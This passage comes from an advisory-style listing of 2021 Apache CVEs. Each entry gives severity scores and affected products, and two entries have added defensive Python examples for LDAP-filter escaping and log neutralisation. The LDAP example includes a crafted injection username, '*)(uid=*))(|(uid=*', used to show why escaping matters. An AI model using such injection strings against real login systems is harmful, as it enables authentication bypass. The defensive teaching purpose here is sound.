redhat enterprise_linux_for_arm_64 8.0
redhat enterprise_linux_eus 8.1
debian debian_linux 11.0
redhat enterprise_linux_for_power_little_endian_eus 8.6
redhat enterprise_linux_server_aus 7.7
tenable tenable.sc *
redhat enterprise_linux_server_aus 8.4
redhat enterprise_linux_for_ibm_z_systems 7.0_s390x
redhat enterprise_linux_server_aus 8.2
redhat enterprise_linux_server_tus 8.2
oracle instantis_enterprisetrack 17.2
redhat enterprise_linux_for_arm_64_eus 8.6
redhat software_collections 1.0
CVE-2021-40439 MEDIUM

Apache OpenOffice has a dependency on the expat software. expat versions prior to 2.1.0 were subject to CVE-2013-0340, a "Billion Laughs" entity expansion denial of service attack exploitable via crafted XML files. ODF files consist of a set of XML files. All versions of Apache OpenOffice up to 4.1.10 are subject to this issue. expat is patched in version 4.1.11.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-40525 MEDIUM

The Apache James ManagedSieve implementation, together with the file storage for sieve scripts, is vulnerable to path traversal, allowing reading and writing any file. This vulnerability has been patched in Apache James 3.6.1 and higher. We recommend the upgrade. Distributed and Cassandra-based products are also not impacted.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache james *
CVE-2021-40690 MEDIUM

All versions of Apache Santuario - XML Security for Java prior to 2.2.3 and 2.1.7 are vulnerable to an issue where the "secureValidation" property is not passed correctly when creating a KeyInfo from a KeyInfoReference element. This allows an attacker to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
oracle retail_service_backbone 15.0.3.1
oracle peoplesoft_enterprise_peopletools 8.59
apache tomee *
oracle commerce_guided_search 11.3.2
oracle retail_service_backbone 16.0.3
oracle retail_bulk_data_integration 16.0.3
apache santuario_xml_security_for_java *
oracle retail_integration_bus 14.1.3.2
debian debian_linux 10.0
oracle retail_integration_bus 16.0.3
oracle retail_merchandising_system 16.0.3
oracle peoplesoft_enterprise_peopletools 8.58
oracle retail_financial_integration 15.0.3.1
oracle agile_plm 9.3.6
oracle communications_diameter_intelligence_hub *
oracle retail_integration_bus 15.0.3.1
oracle weblogic_server 12.2.1.4.0
oracle retail_service_backbone 19.0.1
apache cxf 3.4.4
oracle retail_merchandising_system 19.0.1
oracle commerce_platform 11.3.2
debian debian_linux 9.0
oracle retail_financial_integration 19.0.1
debian debian_linux 11.0
oracle retail_financial_integration 16.0.3
oracle retail_integration_bus 19.0.1
oracle outside_in_technology 8.5.5
oracle retail_service_backbone 14.1.3.2
oracle weblogic_server 14.1.1.0.0
oracle communications_messaging_server 8.1
oracle flexcube_private_banking 12.1.0
oracle retail_financial_integration 14.1.3.2
CVE-2021-40865 HIGH

An Unsafe Deserialization vulnerability exists in the worker services of the Apache Storm supervisor server allowing pre-auth Remote Code Execution (RCE). Apache Storm 2.2.x users should upgrade to version 2.2.1 or 2.3.0. Apache Storm 2.1.x users should upgrade to version 2.1.1. Apache Storm 1.x users should upgrade to version 1.2.4.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache storm *
CVE-2021-4104 MEDIUM

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache log4j 1.2
oracle business_process_management_suite 12.2.1.3.0
oracle enterprise_manager_base_platform 13.4.0.0
redhat jboss_enterprise_application_platform 6.0.0
oracle advanced_supply_chain_planning 12.1
oracle communications_unified_inventory_management 7.4.2
oracle tuxedo 12.2.2.0.0
oracle e-business_suite_cloud_manager_and_cloud_backup_module 2.2.1.1.1
redhat enterprise_linux 6.0
oracle business_intelligence 12.2.1.4.0
oracle financial_services_revenue_management_and_billing_analytics 2.8.0.0
oracle goldengate -
oracle business_intelligence 5.9.0.0.0
redhat software_collections -
oracle communications_offline_mediation_controller *
oracle weblogic_server 12.2.1.3.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.1
oracle identity_management_suite 12.2.1.3.0
oracle retail_allocation 15.0.3.1
redhat enterprise_linux 8.0
oracle communications_unified_inventory_management 7.3.5
redhat integration_camel_k -
redhat jboss_fuse 6.0.0
oracle fusion_middleware_common_libraries_and_tools 12.2.1.4.0
oracle communications_offline_mediation_controller 12.0.0.5.0
redhat jboss_operations_network 3.0
redhat jboss_a-mq 6.0.0
redhat jboss_a-mq_streaming -
redhat enterprise_linux 7.0
oracle utilities_testing_accelerator 6.0.0.3.1
redhat openshift_container_platform 4.6
redhat jboss_a-mq 7
redhat jboss_fuse 7.0.0
oracle advanced_supply_chain_planning 12.2
oracle weblogic_server 14.1.1.0.0
redhat openshift_container_platform 4.7
oracle utilities_testing_accelerator 6.0.0.1.1
oracle communications_eagle_ftp_table_base_retrieval 4.5
redhat jboss_enterprise_application_platform 7.0
redhat openshift_application_runtimes -
oracle communications_unified_inventory_management 7.3.4
oracle hyperion_infrastructure_technology *
oracle retail_allocation 14.1.3.2
redhat jboss_fuse_service_works 6.0
oracle enterprise_manager_base_platform 13.5.0.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle hyperion_data_relationship_management *
redhat jboss_data_grid 7.0.0
redhat jboss_web_server 3.0
oracle utilities_testing_accelerator 6.0.0.2.2
oracle mysql_enterprise_monitor *
redhat jboss_data_virtualization 6.0.0
oracle timesten_grid -
oracle stream_analytics -
oracle weblogic_server 12.2.1.4.0
oracle identity_management_suite 12.2.1.4.0
oracle jdeveloper 12.2.1.3.0
oracle business_intelligence 12.2.1.3.0
oracle healthcare_data_repository 8.1.0
redhat integration_camel_quarkus -
oracle retail_allocation 16.0.3
oracle retail_allocation 19.0.1
oracle communications_network_integrity 7.3.6
oracle retail_extract_transform_and_load 13.2.5
redhat codeready_studio 12.0
redhat single_sign-on 7.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.0
oracle business_process_management_suite 12.2.1.4.0
redhat process_automation 7.0
oracle communications_messaging_server 8.1
redhat openshift_container_platform 4.8
CVE-2021-41079 MEDIUM

Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-835,

Products Affected

Vendor Product Version
apache tomcat *
debian debian_linux 9.0
debian debian_linux 10.0
debian debian_linux 11.0
netapp management_services_for_element_software_and_netapp_hci -
CVE-2021-41303 HIGH

In Apache Shiro before 1.8.0, when using Apache Shiro with Spring Boot, a specially crafted HTTP request may cause an authentication bypass. Users should update to Apache Shiro 1.8.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
apache shiro *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
CVE-2021-41524 MEDIUM

While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
apache http_server 2.4.49
oracle instantis_enterprisetrack 17.1
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
CVE-2021-41532 MEDIUM

In Apache Ozone before 1.2.0, Recon HTTP endpoints provide access to OM, SCM and Datanode metadata. Due to a bug, any unauthenticated user can access the data from these endpoints.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-41561 MEDIUM

Improper Input Validation vulnerability in Parquet-MR of Apache Parquet allows an attacker to cause a DoS via malicious Parquet files. This issue affects Apache Parquet-MR version 1.9.0 and later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache parquet_java *
apache parquet-mr *
CVE-2021-41571 MEDIUM

In Apache Pulsar it is possible to access data from BookKeeper that does not belong to the topics accessible by the authenticated user. The Admin API get-message-by-id requires the user to input a topic and a ledger id. The ledger id is a pointer to the data, and it is supposed to be a valid id for the topic. Authorisation controls are performed against the topic name and there is no proper validation that the ledger id is valid in the context of that topic. So it may happen that the user is able to read from a ledger that contains data owned by another tenant. This issue affects Apache Pulsar version 2.8.0 and prior versions; Apache Pulsar version 2.7.3 and prior versions; Apache Pulsar version 2.6.4 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.8.0
CVE-2021-41585 MEDIUM

Improper Input Validation vulnerability in accepting socket connections in Apache Traffic Server allows an attacker to make the server stop accepting new connections. This issue affects Apache Traffic Server 5.0.0 to 9.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2021-41616 HIGH

Apache DB DdlUtils 1.0 included a BinaryObjectsHelper that was intended for use when migrating database data with a SQL data type of BINARY, VARBINARY, LONGVARBINARY, or BLOB between databases using the ddlutils features. The BinaryObjectsHelper class was insecure and used ObjectInputStream.readObject without validating that the input data was safe to deserialize. Please note that DdlUtils is no longer being actively developed. To address the insecurity of the BinaryObjectsHelper class, the following changes to DdlUtils have been made: (1) BinaryObjectsHelper.java has been deleted from the DdlUtils source repository and the DdlUtils feature of propagating data of SQL binary types is therefore no longer present in DdlUtils; (2) The ddlutils-1.0 release has been removed from the Apache Release Distribution Infrastructure; (3) The DdlUtils web site has been updated to indicate that DdlUtils is now available only as source code, not as a packaged release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ddlutils 1.0
CVE-2021-41766 MEDIUM

Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client-server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the target's class path. Generally speaking, deserialization of untrusted data always represents a high security risk and should be prevented. The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends on system-scoped classes (e.g. jars in the lib folder).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache karaf *
CVE-2021-41767 MEDIUM

Apache Guacamole 1.3.0 and older may incorrectly include a private tunnel identifier in the non-private details of some REST responses. This may allow an authenticated user who already has permission to access a particular connection to read from or interact with another user's active use of that same connection.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache guacamole *
CVE-2021-41773 MEDIUM

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
apache http_server 2.4.49
oracle instantis_enterprisetrack 17.1
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
CVE-2021-41830 MEDIUM

It is possible for an attacker to manipulate signed documents and macros to appear to come from a trusted source. All versions of Apache OpenOffice up to 4.1.10 are affected. Users are advised to update to version 4.1.11. See CVE-2021-25633 for the LibreOffice advisory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-347,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-41831 MEDIUM

It is possible for an attacker to manipulate the timestamp of signed documents. All versions of Apache OpenOffice up to 4.1.10 are affected. Users are advised to update to version 4.1.11. See CVE-2021-25634 for the LibreOffice advisory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-347,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-41832 MEDIUM

It is possible for an attacker to manipulate documents to appear to be signed by a trusted source. All versions of Apache OpenOffice up to 4.1.10 are affected. Users are advised to update to version 4.1.11. See CVE-2021-25635 for the LibreOffice advisory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-347,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-41971 MEDIUM

Apache Superset up to and including 1.3.0 when configured with ENABLE_TEMPLATE_PROCESSING on (disabled by default) allowed SQL injection when a malicious authenticated user sends an http request with a custom URL.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-41972 MEDIUM

Apache Superset up to and including 1.3.1 allowed authenticated users to obtain the passwords of configured database connections. This information could be accessed in a non-trivial way.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-41973 MEDIUM

In Apache MINA, a specifically crafted, malformed HTTP request may cause the HTTP Header decoder to loop indefinitely. The decoder assumed that the HTTP Header begins at the beginning of the buffer and loops if there is more data than expected. Please update MINA to 2.1.5 or greater.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle fusion_middleware_common_libraries_and_tools 12.2.1.3.0
oracle banking_payments 14.5
oracle communications_cloud_native_core_console 1.9.0
oracle banking_trade_finance_process_management 14.5
oracle flexcube_universal_banking *
oracle fusion_middleware_common_libraries_and_tools 12.2.1.4.0
oracle fusion_middleware_common_libraries_and_tools 14.1.1.0.0
oracle flexcube_universal_banking 14.5
oracle banking_treasury_management 14.5
apache mina *
oracle customer_management_and_segmentation_foundation 18.0
oracle oss_support_tools 2.12.42
oracle customer_management_and_segmentation_foundation 19.0
CVE-2021-42009 MEDIUM

An authenticated Apache Traffic Control Traffic Ops user with Portal-level privileges can send a request with a specially-crafted email subject to the /deliveryservices/request Traffic Ops endpoint to send an email, from the Traffic Ops server, with an arbitrary body to an arbitrary email address. Apache Traffic Control 5.1.x users should upgrade to 5.1.3 or 6.0.0. 4.1.x users should upgrade to 5.1.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache traffic_control *
CVE-2021-42010

Heron versions <= 0.20.4-incubating allow CRLF log injection because of the lack of escaping in the log statements. Please update to version 0.20.5-incubating, which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache heron *
CVE-2021-42013 HIGH

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,NVD-CWE-Other,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server 2.4.50
netapp cloud_backup -
fedoraproject fedora 34
oracle jd_edwards_enterpriseone_tools *
oracle secure_backup *
apache http_server 2.4.49
oracle instantis_enterprisetrack 17.1
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
CVE-2021-42250 MEDIUM

Improper output neutralization for Logs. A specific Apache Superset HTTP endpoint allowed for an authenticated user to forge log entries or inject malicious content into logs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-117,CWE-116,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-42340 MEDIUM

The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-772,

Products Affected

Vendor Product Version
apache tomcat 10.1.0
oracle retail_store_inventory_management 15.0.3.3
oracle retail_store_inventory_management 16.0.3.7
apache tomcat 10.0.0
oracle agile_engineering_data_management 6.2.1.0
oracle retail_customer_insights 16.0.2
oracle communications_diameter_signaling_router *
oracle managed_file_transfer 12.2.1.4.0
netapp hci -
oracle retail_customer_insights 15.0.2
oracle retail_eftlink 21.0.0
oracle big_data_spatial_and_graph *
apache tomcat *
oracle retail_store_inventory_management 14.1.3.5
oracle sd-wan_edge 9.1
oracle retail_store_inventory_management 15.0.3.8
oracle retail_data_extractor_for_merchandising 15.0.2
oracle payment_interface 20.3
oracle taleo_platform *
oracle middleware_common_libraries_and_tools 12.2.1.4.0
oracle payment_interface 19.1
oracle retail_financial_integration 16.0.1
oracle sd-wan_edge 9.0
debian debian_linux 11.0
netapp management_services_for_element_software -
oracle retail_financial_integration 19.0.0
oracle retail_store_inventory_management 14.1.3.14
oracle hospitality_cruise_shipboard_property_management_system 20.1.0
oracle managed_file_transfer 12.2.1.3.0
oracle retail_store_inventory_management 14.0.4.13
oracle retail_data_extractor_for_merchandising 16.0.2
CVE-2021-42357 MEDIUM

When using Apache Knox SSO prior to 1.6.1, a request could be crafted to redirect a user to a malicious page due to improper URL parsing. A request that included a specially crafted request parameter could be used to redirect the user to a page controlled by an attacker. This URL would need to be presented to the user outside the normal request flow through a XSS or phishing campaign.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache knox *
CVE-2021-43045 MEDIUM

A vulnerability in the .NET SDK of Apache Avro allows an attacker to allocate excessive resources, potentially causing a denial-of-service attack. This issue affects .NET applications using Apache Avro version 1.10.2 and prior versions. Users should update to version 1.11.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
apache avro *
CVE-2021-43082 HIGH

Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in the stats-over-http plugin of Apache Traffic Server allows an attacker to overwrite memory. This issue affects Apache Traffic Server 9.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-120,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2021-43083 MEDIUM

Apache PLC4X - PLC4C (only the C language implementation was affected) was vulnerable to an unsigned integer underflow flaw inside the TCP transport. Users should update to 0.9.1, which addresses this issue. However, in order to exploit this vulnerability, a user would have to actively connect to a malicious device which could send a response with invalid content. Currently we consider the probability of this being exploited as quite minimal, although this could change in the future, especially as industrial networks become more and more interconnected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,CWE-191,

Products Affected

Vendor Product Version
apache plc4x *
CVE-2021-43297 HIGH

A deserialization vulnerability existed in dubbo hessian-lite 3.2.11 and earlier versions, which could lead to malicious code execution. Most Dubbo users use Hessian2 as the default serialization/deserialization protocol; when Hessian catches unexpected exceptions it logs some information for users, which may cause remote command execution. This issue affects Apache Dubbo 2.6.x versions prior to 2.6.12, Apache Dubbo 2.7.x versions prior to 2.7.15, and Apache Dubbo 3.0.x versions prior to 3.0.5.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-43350 HIGH

An unauthenticated Apache Traffic Control Traffic Ops user can send a request with a specially-crafted username to the POST /login endpoint of any API version to inject unsanitized content into the LDAP filter.
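The fix for this class of bug is to escape the submitted value before it is interpolated into the filter. The following Python is an added example, not Traffic Ops code: it implements RFC 4515 section 3 escaping, places a vulnerable login filter beside the hardened one, and counts clauses as a cheap invariant. The filter shape, the attribute names and the injected username are assumptions chosen for the demonstration.

```python
def escape_ldap_filter_value(value: str) -> str:
    """Escape one assertion value for an LDAP search filter (RFC 4515, section 3).

    '*', '(', ')', '\\' and NUL become a backslash followed by two hex
    digits, so the value can no longer open, close or wildcard a clause.
    """
    out = []
    for ch in value:
        if ch in '*()\\\x00':
            out.append('\\%02x' % ord(ch))
        else:
            out.append(ch)
    return ''.join(out)


def login_filter_unsafe(username: str) -> str:
    """Vulnerable pattern: the submitted username is interpolated verbatim."""
    return f'(&(objectClass=person)(uid={username}))'


def login_filter_safe(username: str) -> str:
    """Hardened pattern: the username is escaped before interpolation."""
    return f'(&(objectClass=person)(uid={escape_ldap_filter_value(username)}))'


def clause_count(filter_text: str) -> int:
    """Number of clauses a filter opens; this login filter should always open 3."""
    return filter_text.count('(')


# Constructed attacker input (an assumption of this example): it closes the
# uid clause and ORs in a wildcard match.
INJECTED_USERNAME = '*)(uid=*))(|(uid=*'

if __name__ == '__main__':
    for name in ['alice', INJECTED_USERNAME]:
        unsafe, safe = login_filter_unsafe(name), login_filter_safe(name)
        print('unsafe: %s -> %d clauses' % (unsafe, clause_count(unsafe)))
        print('safe:   %s -> %d clauses' % (safe, clause_count(safe)))
```

The clause count is not a substitute for escaping; it is the kind of assertion worth keeping in a unit test so that a future refactor that drops the escaping step fails loudly.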

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-90,CWE-74,

Products Affected

Vendor Product Version
apache traffic_control *
apache traffic_control 5.1.4
apache traffic_control 6.0.1
CVE-2021-43410 MEDIUM

Apache Airavata Django Portal allows CRLF log injection because of a lack of escaping in log statements. In particular, some HTTP request parameters are logged without first being escaped. Versions affected: master branch before commit 3c5d8c7 [1] of airavata-django-portal. [1] https://github.com/apache/airavata-django-portal/commit/3c5d8c72bfc3eb0af8693a655a5d60f9273f8170
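This entry, the Heron entry (CVE-2021-42010) and the Superset entry (CVE-2021-42250) all describe the same failure: an attacker-controlled value reaches a log statement with its CR/LF intact and can terminate the real record and append a forged one. The following Python is an added example, not code from any of those projects: it neutralises a value for logging, shows the vulnerable concatenation beside the neutralised one, and counts how many records a newline-splitting consumer would see. The record layout, the length limit and the forged username are assumptions chosen for the demonstration.

```python
def neutralize_for_log(value: str, max_len: int = 256) -> str:
    """Make an untrusted value safe to embed in a single log record.

    CR and LF are rendered as the two-character escapes '\\r' and '\\n', every
    other C0/C1 control character as '\\xNN', so the value can neither end
    the record nor start a forged one; over-long values are truncated.
    max_len is an assumed limit, not something the affected projects define.
    """
    out = []
    for ch in value:
        code = ord(ch)
        if ch == '\n':
            out.append('\\n')
        elif ch == '\r':
            out.append('\\r')
        elif code < 0x20 or 0x7f <= code < 0xa0:
            out.append('\\x%02x' % code)
        else:
            out.append(ch)
    text = ''.join(out)
    if len(text) > max_len:
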